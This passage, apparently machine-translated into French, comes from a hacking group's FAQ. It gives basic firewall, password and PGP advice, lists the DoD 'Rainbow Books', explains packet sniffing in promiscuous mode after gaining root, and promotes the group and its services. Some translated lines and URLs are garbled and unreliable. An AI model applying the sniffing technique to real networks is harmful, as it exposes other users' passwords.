     Tout le trafic de l'intérieur vers l'extérieur, ainsi que de l'extérieur vers l'intérieur doit passer par le pare-feu.
     Permettre uniquement le trafic autorisé tel que défini par votre politique de sécurité de l'entreprise soit transmis par le pare-feu.
     Assurez-vous que le pare-feu est à l'abri de la pénétration.

8. Éduquer les utilisateurs sur la protection par mot de passe:
     Éduquer les utilisateurs à ne pas utiliser de mots de passe faciles à deviner.
     S'assurer que les longueurs de mot de passe sont adéquates.
     Exécution d'un adepte de mot de passe.
     Exiger l'utilisation d'un générateur de mot de passe.
     Toujours utiliser un mélange de caractères en majuscules et minuscules.
     Utiliser toujours au moins un ou deux caractères non alphanumériques.
     N'utilisez jamais de mots de dictionnaires ou d'écrits en arrière.
     N'utilisez jamais une partie ou une variante d'un nom propre, d'une adresse ou de tout élément susceptible de vous identifier (l'utilisateur).

9. Les organisations liées à la sécurité jouent un rôle essentiel dans le développement et le déploiement des technologies Internet. Restez au courant des dernières activités liées à la sécurité en visitant leurs sites Web. Voici quelques organisations clés de sécurité qui aident les entreprises comme la vôtre à garder l'Internet un endroit plus sûr pour calculer:
ACM/SIGSAC sur gopher://gopher.acm.org/.
CERT (a 24-hour Computer Emergency Response Team) sur: ftp://info.cert.org/pub/cert_faq et http://www.sei.cmu.edu/SEI/programs/cert.html.
CIAC (U.S. Department of Energy's Computer Incident Advisory Capability) sur: http://ciac.llnl.gov/
CPSR (Computer Professionals for Social Responsibility) sur: http://cpsr.org.home
EFF (Electronic Frontier Foundation) sur: http://www.eff.org/
EPIC (Electronic Privacy Information Center) sur: http:/epic.org/
FIRST (Forum of Incident Reponse and Security Teams) sur: http://first.org/first/
Internet Society sur http://www.isoc.org/


Q. Qu'est-ce qu'un «livre arc-en-ciel»?

R. Les livres d'arc-en-ciel sont des livres sur la sécurité. La liste actuelle des livres est indiquée ci-dessous.
Orange Book- Department of Defense Trusted Computer System Evaluation Criteria.
Green Book- Department of Defense Password Management Guideline.
Yellow Book- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments.
Tan Book- A Guide to Understanding Audit in Trusted Systems.
Bright Blue Book- A Guide for Vendors.
Neon Orange Book- A Guide to Understanding Discretionary Access Control in Trusted Systems.
Teal Green Book- Glossary of Computer Security Terms.
Red Book- Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria.
Burgandy Book- A Guide to Understanding Design Documentation in Trusted Systems.
Dark Lavender Book- A Guide to Understanding Trusted Distribution in Trusted Systems.
Venice Blue Book- Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria.
Aqua Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Modeling in Trusted Systems.
Dark Red Book- Guidance for Applying the Trusted Network Interpretation.
Pink Book- Department of Defense Trusted Computer System Evaluation Criteria Rating Maintenance Phase.
Purple Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Formal Verification Systems.
Brown Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Trusted Facility Management.
Yellow-Green Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Writing Trusted Facility Manuals.
Light Blue Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Identification and Authentication in Trusted Systems.
Blue Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Product Evaluation Questionnaire.
Grey Book-Department of Defense Trusted Computer System Evaluation Criteria Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System.
Lavender Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria.
Bright Orange Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understandng Security Testing and Test Documentation in Trusted Systems.
Hot Peach Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Writing the Security Features User's Guide for Trusted Systems.
Turquoise Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems.
Violet Book- Department of Defense Trusted Computer System Evaluation Criteria Assessing Controlled Access Protection.
Light Pink Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Covert Channel Analysis of Trusted Systems.
C1 Technical Report-001- Department of Defense Trusted Computer System Evaluation Criteria Computer Viruses: Prevention, Detection, and Treatment.
C Technical Report 79-91- Department of Defense Trusted Computer System Evaluation Criteria Integrity in Automated Information Systems.
C Technical Report 39-92- Department of Defense Trusted Computer System Evaluation Criteria The Design and Evaluation of INFOSEC systems: The Computer Security Contributions to the Composition Discussion.
NTISSAM COMPUSEC/1-87- Department of Defense Trusted Computer System Evaluation Criteria Advisory Memorandum on Office Automation Security Guideline.


Q. Qu'est-ce qu'un pare-feu?

A. Un pare-feu est un système ou un groupe de systèmes qui applique une politique de contrôle d'accès entre deux réseaux. Le moyen réel par lequel cela est accompli varie considérablement, mais en principe, le pare-feu peut être considéré comme une paire de mécanismes: celui qui existe pour bloquer le trafic et l'autre qui existe pour permettre le trafic. Certains pare-feux mettent davantage l'accent sur le blocage du trafic, tandis que d'autres insistent sur le fait d'autoriser le trafic. Probablement la chose la plus importante à reconnaître à propos d'un pare-feu est qu'il met en œuvre une politique de contrôle d'accès. Si vous n'avez pas une bonne idée du type d'accès que vous souhaitez autoriser ou de refuser, ou simplement vous permettez à quelqu'un ou à un produit de configurer un pare-feu en fonction de ce qu'ils pensent faire, alors ils élaborent une politique pour votre organisation dans son ensemble.


Q. Comment puis-je utiliser PGP pour me bénéficier?

A. PGP est facile à utiliser, il vous donne suffisamment de corde pour que vous puissiez vous accrocher. Vous devriez bien connaître les différentes options de PGP avant de l'utiliser pour envoyer des messages sérieux. Par exemple, donner la commande pgp -sat <filename> ne signera qu'un message, il ne le cryptera pas. Même si la sortie semble être chiffrée, ce n'est vraiment pas le cas. Quelqu'un dans le
monde pourrait récupérer le texte original.

Q. Qu'est-ce qu'un renifleur?

A. Tiré des FAQ de Sniffer.
Contrairement aux circuits téléphoniques, les réseaux informatiques sont des canaux de communication partagés. Il est tout simplement trop coûteux de consacrer des boucles locales au commutateur (hub) pour chaque paire d'ordinateurs communicants. Le partage signifie que les ordinateurs peuvent recevoir des informations destinées à d'autres machines. Pour capturer l'information sur le réseau, on appelle le reniflement.

La manière la plus populaire de connecter les ordinateurs est par ethernet. Le protocole Ethernet fonctionne en envoyant des informations de paquets à tous les hôtes sur le même circuit. L'en-tête du paquet contient l'adresse appropriée de la machine de destination. Seule la machine avec l'adresse correspondante supporte accepter le paquet. Une machine qui accepte tous les paquets, peu importe ce que l'en-tête du paquet indique, soit en mode promiscuous.

Parce que, dans un environnement de réseautage normal, les informations de compte et de mot de passe passent le long d'ethernet en texte clair, il n'est pas difficile pour un intrus une fois qu'ils ont la racine pour mettre une machine en mode promiscuous et en reniflant, compromettent toutes les machines sur le net.

Q. Qu'est-ce que Psychotic?

R. Je décrirais Psychotic comme plus d'un groupe professionnel que d'un simple clan de Hacking. Nous pensons à l'argent en premier et piratons en deuxième, même si je suis sûr que la plupart d'entre vous ont vu quelques-uns de nos projets de piratage ...

Q. Est-ce que Psychotic cherche de nouveaux membres?

R. À l'heure actuelle, nous ne cherchons pas d'ajouts à notre personnel, mais soyez informés, nous pourrions décider que nous avons besoin de nouveaux membres.

Q. Qu'est-ce que Psychose?

A. Psychose est un projet personnel entrepris par Virtual Circuit. C'est un prix qu'il attribue aux Hackers qui ont fait quelque chose à souligner (bonne page Web, exploits révélés, etc.). Si vous pensez que vous devriez recevoir le prix, vous pouvez l'envoyer par la poste. Mais je peux vous dire maintenant que le prix n'est pas facile à obtenir.

Q. Qu'est-ce que Devil's Gateway (la "Porte du diable")?

A. Le "Devil's Gateway" est un projet personnel repris par VooDooHex. C'est comme une guilde retrival d'information, mais c'est toujours comme un groupe. Si vous êtes intéressé à vous joindre à Devil's Gateway, vous devez envoyer un mail à VooDoo à ce sujet.

Q. Où puis-je trouver de bonnes ressources sur le Hacking et le Phreaking?

R. Bien, nous ne sommes pas beaucoup pour les liens, mais vous devriez vérifier la page Psychose pour ses gagnants des prix de la page Web. Il ne choisit que le meilleur.

Q. Qui sont tous les membres de Psychotic?

R. Nous aimerions rester anonymes. Mais vous verrez un nom de membre de temps en temps.

Q. Quels sont les services offerts par Psychotic?

A. Psychotic possède de nombreux services, tests de sécurité, conception de pages Web, design graphique, parrainage, comptes pop et hébergement de pages Web. Chaque service a un prix différent. Vous pouvez en savoir plus sur nos services sur la section Services de la page.



Ce n'est que la première copie de nos FAQ. Nous allons mettre à jour et ajouter des informations et des questions le plus souvent possible. J'apprendrais si vous distribuiez et publiez ce texte autant que vous le pouvez. Nous ne voulons pas que les gens nous posent ces questions. Amusez-vous et gardez le métro vivant.
Posté par The_Nightwalker_X
cette fiche a été consultée 202 fois depuis le 14/09/2017

[Dire quelque chose à propos de cette fiche]




 Lire aussi...

Inspirates images
[piratage ] hacking de compte facebook,Gmail,... 2018
Inspirates images
comment installer l'outils de hacking linux sur Android?
Inspirates images
Meilleurs outils de piratage de 2018 pour Windows, Linux et OS X
Inspirates images
15 meilleures applications de piratage gratuit pour les téléphones Android (2018 Edition)
Inspirates images
Etes-vous Hacker? Testez-vous avec ce Quiz-512 questions du Hacker Test'97